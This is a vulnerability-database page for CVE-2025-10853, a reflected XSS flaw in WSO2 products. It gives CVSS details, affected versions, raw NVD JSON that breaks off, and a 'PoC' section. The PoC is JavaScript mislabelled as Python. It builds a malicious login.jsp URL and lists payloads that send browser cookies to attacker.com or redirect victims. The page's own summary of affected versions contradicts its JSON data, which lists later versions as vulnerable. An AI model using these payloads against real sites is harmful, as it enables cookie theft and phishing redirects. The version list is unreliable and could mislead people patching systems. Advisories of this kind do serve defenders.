CVE-2025-10853

Description

A reflected cross-site scripting (XSS) vulnerability exists in the management console of multiple WSO2 products due to improper output encoding. By tampering with specific parameters, a malicious actor can inject arbitrary JavaScript into the response, leading to reflected XSS. Successful exploitation could result in UI manipulation, redirection to malicious websites, or data theft from the browser. However, session-related sensitive cookies are protected with the httpOnly flag, which mitigates the risk of session hijacking.

CVSS Details

CVSS Score

5.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:3.1.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:* - VULNERABLE

WSO2 API Manager < 4.3.0

WSO2 Enterprise Integrator < 6.6.0

WSO2 Identity Server < 5.11.0

WSO2 Data Services Server < 3.13.0

其他未及时更新的WSO2产品版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-10853 Reflected XSS PoC
// Target: WSO2 Management Console

const http = require('http');

// Malicious XSS payload
const xssPayload = '<script>alert(document.cookie)</script>';

// URL encode the payload for HTTP request
const encodedPayload = encodeURIComponent(xssPayload);

// Construct the malicious URL
const targetHost = 'target-wso2-server.com';
const targetPath = '/carbon/admin/login.jsp';
const maliciousUrl = `http://${targetHost}${targetPath}?error=${encodedPayload}`;

console.log('[+] CVE-2025-10853 Reflected XSS PoC');
console.log('[+] Target:', targetHost);
console.log('[+] Malicious URL:', maliciousUrl);
console.log('[+] Payload:', xssPayload);

// Alternative payload examples:
const altPayloads = [
  '<img src=x onerror="fetch(\'http://attacker.com/steal?c=\'+document.cookie)">',
  '<svg onload="document.location=\'http://attacker.com/redirect?url=\'+window.location.href">',
  '<script>fetch(\'https://attacker.com/api/log?data=\'+btoa(document.cookie))</script>'
];

console.log('\n[+] Alternative payloads:');
altPayloads.forEach((p, i) => console.log(`    ${i+1}. ${p}`));

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10853
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10853
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10853/
[4] VulDB https://vuldb.com/cve/CVE-2025-10853
[5] https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4486/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10853", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2025-11-05T20:15:32.297", "lastModified": "2025-11-13T15:31:45.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability exists in the management console of multiple WSO2 products due to improper output encoding. By tampering with specific parameters, a malicious actor can inject arbitrary JavaScript into the response, leading to reflected XSS.\n\nSuccessful exploitation could result in UI manipulation, redirection to malicious websites, or data theft from the browser. However, session-related sensitive cookies are protected with the httpOnly flag, which mitigates the risk of session hijacking."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_control_plane:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DEEA7DB5-BBF7-44A4-9FB6-0D235A44C680"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "1344FB79-0796-445C-A8F3-C03E995925D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E31E32CD-497E-4EF5-B3FC-8718EE06EDAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "B58251E8-606B-47C8-8E50-9F9FC8C179BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "E21D7ABF-C328-425D-B914-618C7628220B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "51465410-6B7C-40FD-A1AB-A14F650A6AC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "851470CC-22AB-43E4-9CC6-5E22D49B3572"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "9EBAB99E-6F0F-4CE9-A954-E8878826304C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "0B3E6207-B2CF-487C-9CB8-906248B665C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:api_manager:4.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "D47B760D-5418-4FB0-88F0-3F78BAFF63E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:enterprise_integrator:6.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "E4A07C73-3E6B-4CF9-BEB9-39C6081C0332"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4F126CA-A2F9-44F4-968B-DF71765869E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:5.11.0:*:*:*:*:*:*:*", "matchCriteriaId": "2153AECE-020A-4C01-B2A6-F9F5D98E7EBE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "32CE7893-AD1A-49E5-BD1A-5E9C2DEB8764"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:6.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "EA76533A-5BED-4BDC-B348-EB3D3FDFB110"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "C1EFBD0F-9664-4EF3-9908-C72B1318F68F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server:7.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "A5358E6E-8C01-408D-8692-B1A326DC630F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:identity_server_as_key_manager:5.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "6BB34405-A2F1-461A-B51B-E103BB3680A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:open_banking_am:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "94347800-04D2-48C4-ACF0-078A5ACBB063"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:open_banking_iam:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7C241A3-8EA0-41E4-ABF3-21B9D8E7A5BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wso2:traffic_manager:4.5. ... (truncated)